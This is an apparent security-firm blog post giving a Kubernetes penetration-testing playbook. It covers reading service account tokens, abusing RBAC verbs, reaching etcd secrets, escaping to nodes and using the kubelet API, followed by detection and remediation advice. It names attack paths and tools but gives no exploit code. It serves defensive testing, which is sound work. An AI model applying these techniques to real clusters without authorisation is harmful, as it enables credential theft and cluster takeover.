Kubernetes Pentesting: Service Account Tokens, RBAC, etcd, and kube-hunter
Cloud Security
A practical Kubernetes pentest playbook covering service account token theft, RBAC graph abuse, etcd exposure, and kube-hunter scanning.
By Arjun Raghavan, Security & Systems Lead, BIPI · December 15, 2024 · 13 min read
Kubernetes pentests are graph problems. The cluster has hundreds of service accounts, role bindings, and pods, and the attacker's job is to find the path from a low-privilege foothold to cluster admin. The tooling has matured, but the same five primitives keep showing up.
Initial enumeration
- kube-hunter for external and in-cluster discovery of API server, kubelet, and dashboard
- peirates as an interactive in-pod toolkit for token theft and RBAC abuse
- kubectl auth can-i --list to enumerate effective permissions from the current SA
- rbac-tool or KubiScan to graph role bindings across the cluster
Service account token theft
Every pod by default mounts a service account token at /var/run/secrets/kubernetes.io/serviceaccount/token. If the SA has any meaningful RBAC, the pod inherits it. The first thing peirates does in a compromised pod is read that token and probe the API server. Even a service account with list pods cluster-wide is enough to discover where to pivot next.
RBAC abuse primitives
- create pods with hostPath gives you the node filesystem and therefore the node
- patch nodes lets you label or taint and influence scheduler decisions
- create token on a privileged service account mints fresh credentials
- escalate verb on a role lets you grant yourself higher permissions
- impersonate verb is the Kubernetes equivalent of sudo to another identity
etcd exposure
etcd stores every secret in the cluster, by default unencrypted at rest. If you can reach etcd from a pod with network access, or you compromise a control plane node, you have every secret in the cluster. Encryption at rest is configurable but not on by default in many managed offerings before recent versions.
Node escape from a pod
- hostPath mount of / gives full node filesystem from the pod
- host network namespace exposes node services like kubelet on 10250
- Privileged pods can load kernel modules and own the node directly
- Docker or containerd socket mounts let the pod control the runtime
The cluster admin who says we use RBAC has not run rbac-tool against their own cluster recently.
Kubelet on 10250
The kubelet API on port 10250, if exposed and unauthenticated, allows pod exec into any pod on the node. Cloud providers usually gate this, but on-prem and self-managed clusters frequently leave it accessible. kube-hunter flags this immediately.
Detection
- Audit logs for create pods with privileged or hostPath fields outside expected namespaces
- Falco rules for shell in container and unexpected outbound network from system namespaces
- API server flag --audit-log-maxage and shipping to a SIEM for retention
- Cilium or other CNI policies enforcing pod-to-API-server segmentation
Remediation
- Enforce Pod Security Standards restricted profile across all non-system namespaces
- Disable automountServiceAccountToken unless the pod truly needs API access
- Encrypt etcd at rest and restrict control plane network access
- Use OPA Gatekeeper or Kyverno policies to block hostPath, privileged, and host namespaces
- Move secrets to an external store like Vault or cloud KMS rather than Kubernetes Secrets
- Run rbac-tool quarterly and alert on new admin-reachable principals
Closing
Kubernetes is not insecure by design, but its defaults are permissive and its admins are usually outnumbered by namespaces. A monthly run of kube-hunter, peirates in a controlled pod, and rbac-tool will surface the path your adversary would take. Walk it before they do.
Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.